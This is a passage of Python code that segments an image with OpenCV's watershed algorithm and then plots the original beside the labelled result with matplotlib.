# Distance transform plus a high threshold extracts the sure-foreground region.
img5 = cv.distanceTransform(img3,
                            cv.DIST_L2,
                            5)
ret, img6 = cv.threshold(img5,
                         0.65 * img5.max(),
                         255,
                         0)
img6 = np.uint8(img6)
# The unknown region is sure background minus sure foreground.
img7 = cv.subtract(img4, img6)
# Label the sure-foreground components, shift all labels up by one so the
# background is 1 instead of 0, then mark the unknown region with 0.
ret, markers = cv.connectedComponents(img6)
markers = markers + 1
markers[img7 == 255] = 0
# Watershed marks boundary pixels with -1; paint them red on the original.
img8 = cv.watershed(img1, markers)
img1[markers == -1] = [255, 0, 0]
plt.figure(figsize=(30,30))
plt.subplot(121), plt.imshow(img1), plt.title("ORIGINAL"), plt.axis("off")
plt.subplot(122), plt.imshow(img8, cmap='jet'), plt.title("RESULT"), plt.axis("off")
plt.show() | nilq/baby-python | python |